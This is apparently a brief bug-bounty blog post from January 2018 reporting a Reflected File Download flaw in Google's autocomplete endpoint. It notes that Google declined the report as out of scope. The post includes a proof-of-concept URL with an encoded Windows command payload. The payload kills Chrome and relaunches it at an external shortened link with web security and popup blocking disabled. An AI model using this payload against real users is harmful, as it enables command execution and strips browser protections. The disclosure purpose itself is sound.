Jan 18, 2018

Reflected File Download ( RFD ) in www.Google.com

Advertisement



Bug Report :

Summary: RFD on https://www.google.com/complete/search?client=firefox&q=

Hello ,
 I've found a Reflected File Download in 'q' Parameter in this link https://www.google.com/complete/search?client=firefox&q=


All Steps in this Blog its explain it easy :) 
https://dunnesec.com/category/attacks-defence/reflected-file-download-rfd/


Poc : https://www.google.com/complete/search?client=firefox&q="%7c%7ctaskkill%20%2fF%20%2fIM%20ch%2a%7cmd%7c%7cstart%20chrome%20pi%2evu%2fB2jk%20--disable-web-security%20--disable-popup-blocking%7c%7c







Attack scenario:
a file will be download contains the q parameter information 

Sure the download not work with ISO Safari Browser





The team didn't accept the Report Because it was out of Scope 
Share This
Previous Post
Next Post

Security Researcher at Many Websites - Bug Hunter - Civil Engineer Student

0 comments: